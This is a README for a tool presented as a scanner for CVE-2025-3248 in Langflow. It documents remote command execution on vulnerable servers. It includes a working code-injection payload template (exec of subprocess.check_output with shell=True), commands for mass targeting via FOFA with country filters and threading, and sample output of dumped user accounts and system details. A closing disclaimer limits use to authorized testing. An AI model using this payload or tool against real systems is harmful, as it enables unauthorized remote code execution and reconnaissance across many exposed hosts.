[中文](./README_CN.md) ｜ English

# Langflow Vulnerability Scanner

A vulnerability scanner for CVE-2025-3248 in Langflow applications.

## Features

- Scan single target or multiple targets using FOFA
- Execute system commands on vulnerable targets
- Retrieve system information
- Custom payload support
- Progress bar for FOFA scanning
- Beautiful CLI interface

## Installation

1. Clone the repository:
```bash
git clone https://github.com/xuemian168/CVE-2025-3248.git
cd CVE-2025-3248/
```

2. Install dependencies:
```bash
python3 -m venv venv
source venv/bin/active
pip install -r requirements.txt
```

3. Edit Environment File (optional)
```bash
# After you finish editing
mv .env.example .env
```
## Usage

### Single Target Scan

```bash
python main.py -t https://target.com
```

### Using FOFA API

```bash
python main.py --fofa-email your@email.com --fofa-key your_api_key
```

### Additional Options

- `-t, --target`: Target URL to scan
- `--fofa-email`: FOFA API Email
- `--fofa-key`: FOFA API Key
- `--fofa-query`: FOFA search query (default: 'app="LOGSPACE-LangFlow"')
- `--country`: Filter results by country code (e.g., CN, US)
- `--max-pages`: Maximum number of FOFA pages to retrieve (default: 5)
- `--page-size`: Results per page (default: 100)
- `--timeout`: Request timeout in seconds (default: 10)
- `--no-verify`: Disable SSL verification
- `--threads`: Number of threads for concurrent scanning (default: 5)
- `-f, --file`: Custom Python file to use as payload

## Custom Payloads

You can create custom payloads by creating a Python file:

```python
def test(cd=exec('raise Exception(__import__("subprocess").check_output("your_command", shell=True))')):
    pass
```

Then use it with:
```bash
python main.py -t https://target.com -f your_payload.py
```

## Output Example
```bash
    [+] User Accounts:
        root            UID:0      GID:0      Home:/root                Shell:/bin/bash
        daemon          UID:1      GID:1      Home:/usr/sbin            Shell:/usr/sbin/nologin
        bin             UID:2      GID:2      Home:/bin                 Shell:/usr/sbin/nologin
        sys             UID:3      GID:3      Home:/dev                 Shell:/usr/sbin/nologin
        sync            UID:4      GID:65534  Home:/bin                 Shell:/bin/sync
        games           UID:5      GID:60     Home:/usr/games           Shell:/usr/sbin/nologin
        man             UID:6      GID:12     Home:/var/cache/man       Shell:/usr/sbin/nologin
        lp              UID:7      GID:7      Home:/var/spool/lpd       Shell:/usr/sbin/nologin
        mail            UID:8      GID:8      Home:/var/mail            Shell:/usr/sbin/nologin
        news            UID:9      GID:9      Home:/var/spool/news      Shell:/usr/sbin/nologin
        uucp            UID:10     GID:10     Home:/var/spool/uucp      Shell:/usr/sbin/nologin
        proxy           UID:13     GID:13     Home:/bin                 Shell:/usr/sbin/nologin
        www-data        UID:33     GID:33     Home:/var/www             Shell:/usr/sbin/nologin
        backup          UID:34     GID:34     Home:/var/backups         Shell:/usr/sbin/nologin
        list            UID:38     GID:38     Home:/var/list            Shell:/usr/sbin/nologin
        irc             UID:39     GID:39     Home:/run/ircd            Shell:/usr/sbin/nologin
        _apt            UID:42     GID:65534  Home:/nonexistent         Shell:/usr/sbin/nologin
        nobody          UID:65534  GID:65534  Home:/nonexistent         Shell:/usr/sbin/nologin
        user            UID:1000   GID:0      Home:/app/data            Shell:/bin/sh
```

```bash
    [+] System Details:
        Linux ********** 6.8.0-1020-aws #22-Ubuntu SMP Thu Nov 21 **:**:** UTC 2025 x86_64 GNU/Linux
```

## Disclaimer

⚠️ Disclaimer
This tool is for legal purposes only. It is designed for educational purposes, internal enterprise security testing, or use in authorized environments. It is strictly prohibited to use this tool on any unauthorized system, network, or device, otherwise it may violate relevant laws and regulations.

Users shall bear all legal responsibilities for their actions. The author and contributors are not responsible for any losses, data leakage or legal consequences caused by improper use of this tool.

⚠️ Do not use for illegal attacks. Do not attempt to deploy or run this tool on unauthorized systems.

## References
- https://github.com/langflow-ai/langflow/releases/tag/1.3.0
- https://github.com/langflow-ai/langflow/pull/6911
- https://www.cve.org/cverecord?id=CVE-2025-3248

## License

[MIT License](./LICENSE)
